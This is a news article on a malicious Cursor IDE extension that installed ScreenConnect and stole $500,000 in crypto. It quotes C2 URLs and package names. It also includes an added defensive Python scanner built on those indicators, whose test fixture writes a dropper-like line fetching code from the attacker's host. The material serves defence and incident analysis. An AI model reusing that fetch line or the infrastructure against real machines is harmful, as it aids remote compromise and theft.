Hackers Stole $500,000 in Crypto Assets by Weaponizing AI Extension


An advanced cybercrime operation succeeded in stealing $500,000 in cryptocurrency from a Russian blockchain developer through a malicious extension targeting the Cursor AI integrated development environment.

The attack, which occurred in June 2025, is the latest development in a trend of supply chain attacks that exploit the popularity of AI-powered development tools.

The incident began when the victim, a security-conscious developer who had recently installed a fresh operating system, searched for a Solidity syntax highlighting extension inside the Cursor AI IDE.

Despite using online malware detection services and maintaining strict security practices, the developer unintentionally installed a malicious package disguised as a legitimate development tool.

The fake extension, published under the name “Solidity Language”, collected 54,000 downloads before it was discovered and removed.

What makes this attack particularly notable is the exploitation of the registry's search ranking algorithm to place the malicious extension above the legitimate alternatives.

Description of the extension in the Open VSX registry (Source – Securelist)

The attackers took advantage of the Open VSX ranking system, which factors in update frequency, download counts and ratings.

By publishing their malicious extension with a last-update date of June 15, 2025, compared with the legitimate extension's last update on May 30, 2025, the cybercriminals managed to push their listing to fourth place in the search results, while the legitimate extension appeared in eighth place.

Securelist analysts identified the malware after conducting a forensic analysis of the compromised victim system.

The investigation revealed that the malicious extension contained no actual syntax highlighting functionality; instead it acted as a dropper for a multi-stage attack chain.

Infection chain

The malware's infection mechanism shows an advanced understanding of both social engineering techniques and technical evasion.

Search results for “Solidity” – malicious (red) and legitimate (green) (Source – Securelist)

Upon installation, the extension.js file, located at %userprofile%\.cursor\extensions\solidityai.solidity-1.0.9-universal\src\extension.js, immediately initiated a connection to the command-and-control server angelic[.]su.

The first PowerShell script, retrieved from https://angelic[.]su/files/1.txt, checked for the presence of the ScreenConnect remote access software on the victim's device.

If ScreenConnect was not detected, the malware downloaded a secondary script from https://angelic[.]su/files/2.txt, which then retrieved the ScreenConnect installer from https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi.

This legitimate remote access tool was configured to communicate with the attackers' infrastructure at relay.lmfao[.]su, providing persistent access to the compromised system.
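The infection chain above leaves indicators that a defender can look for on a workstation: the extension identifier under the Cursor extensions folder, and the command-and-control hosts that the dropper and the ScreenConnect client were pointed at. The following scanner is an added example written for this article; it is not code from the article or from Securelist. It walks an IDE extensions directory, derives each extension's publisher.name identifier, and flags any extension whose files reference the indicators quoted in the article (angelic[.]su, lmfao[.]su, relay.lmfao[.]su, the ScreenConnect MSI name) or whose identifier matches one of the extension names the article lists as malicious. The sample directory it scans is constructed inside the script (a stand-in dropper that only fetches a URL, beside a benign extension with a made-up name) so that it runs offline; the indicators are refanged for matching because a real extension.js would not contain the `[.]` defanging.

```python
"""Offline scanner for an IDE extensions directory (e.g. %userprofile%\\.cursor\\extensions).

Added example for this article, not Securelist's or the project's code.
Flags extensions that reference the C2 infrastructure named in the
write-up or that carry one of the extension identifiers it lists.
"""
import json
import re
import tempfile
from pathlib import Path

# Indicators quoted (defanged) in the article; refanged here for matching.
# Longer strings come first so the alternation prefers the most specific hit.
C2_INDICATORS = [
    "ScreenConnect.ClientSetup.msi",
    "relay.lmfao.su",
    "angelic.su",
    "lmfao.su",
]
INDICATOR_RE = re.compile("|".join(re.escape(i) for i in C2_INDICATORS), re.IGNORECASE)

# Extension / package names the article reports as malicious (lower-cased).
KNOWN_BAD_IDS = {
    "solidityai.solidity",   # fake "Solidity Language" extension for Cursor
    "solaibot",
    "among-eth",
    "blankbeesxstnion",
}

SCANNED_SUFFIXES = {".js", ".json", ".ps1", ".txt"}


def extension_id(ext_dir: Path) -> str:
    """Derive 'publisher.name' from package.json, else from the folder name."""
    manifest = ext_dir / "package.json"
    if manifest.is_file():
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
            if "publisher" in data and "name" in data:
                return f"{data['publisher']}.{data['name']}".lower()
        except (json.JSONDecodeError, UnicodeDecodeError):
            pass
    # Folder names look like publisher.name-1.0.9-universal; drop the version suffix.
    return re.sub(r"-\d+\.\d+\.\d+.*$", "", ext_dir.name).lower()


def scan_extension(ext_dir: Path) -> dict:
    """Return the identifier, indicator hits and a verdict for one extension."""
    ext_id = extension_id(ext_dir)
    hits = []
    for path in ext_dir.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCANNED_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="ignore")
            for match in INDICATOR_RE.finditer(text):
                hits.append((str(path.relative_to(ext_dir)), match.group(0)))
    bad_id = ext_id in KNOWN_BAD_IDS or ext_id.rsplit(".", 1)[-1] in KNOWN_BAD_IDS
    return {
        "id": ext_id,
        "known_bad_id": bad_id,
        "ioc_hits": hits,
        "suspicious": bad_id or bool(hits),
    }


def scan_extensions_root(root: Path) -> list:
    """Scan every extension folder directly under the extensions root."""
    return [scan_extension(d) for d in sorted(root.iterdir()) if d.is_dir()]


def build_sample_root() -> Path:
    """Construct a sample extensions folder: one dropper-like, one benign."""
    root = Path(tempfile.mkdtemp()) / "extensions"
    bad_src = root / "solidityai.solidity-1.0.9-universal" / "src"
    bad_src.mkdir(parents=True)
    (bad_src.parent / "package.json").write_text(
        json.dumps({"publisher": "solidityai", "name": "solidity", "version": "1.0.9"}),
        encoding="utf-8",
    )
    # Constructed stand-in for the dropper: no highlighting logic, just a fetch from the C2 host.
    (bad_src / "extension.js").write_text(
        'const url = "https://angelic.su/files/1.txt";\n'
        "exports.activate = () => fetch(url).then(r => r.text());\n",
        encoding="utf-8",
    )
    good = root / "example-publisher.hello-world-0.1.0"  # made-up benign extension
    good.mkdir(parents=True)
    (good / "package.json").write_text(
        json.dumps({"publisher": "example-publisher", "name": "hello-world"}),
        encoding="utf-8",
    )
    (good / "extension.js").write_text(
        'exports.activate = () => console.log("hello");\n', encoding="utf-8"
    )
    return root


if __name__ == "__main__":
    for result in scan_extensions_root(build_sample_root()):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{result['id']:40s} {flag}  hits={result['ioc_hits']}")
```

Point `scan_extensions_root` at a real extensions folder to use it as a triage aid; a hit on a C2 indicator is strong evidence, while a match on the extension name alone should be confirmed against the publisher and file contents, since a benign extension could reuse a name.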

The use of legitimate administrative tools is a common tactic among advanced threat actors, as it blends malicious activity in with regular system operations.

The attack infrastructure reveals a well-organized operation that extends beyond this single incident.

Researchers discovered further malicious packages, including “Solsafe” in the npm repository and three additional Visual Studio Code extensions: Solaibot, among-eth, and BlankbeesxStnion, all of which use identical infection methodologies and communicate with the same command-and-control infrastructure.
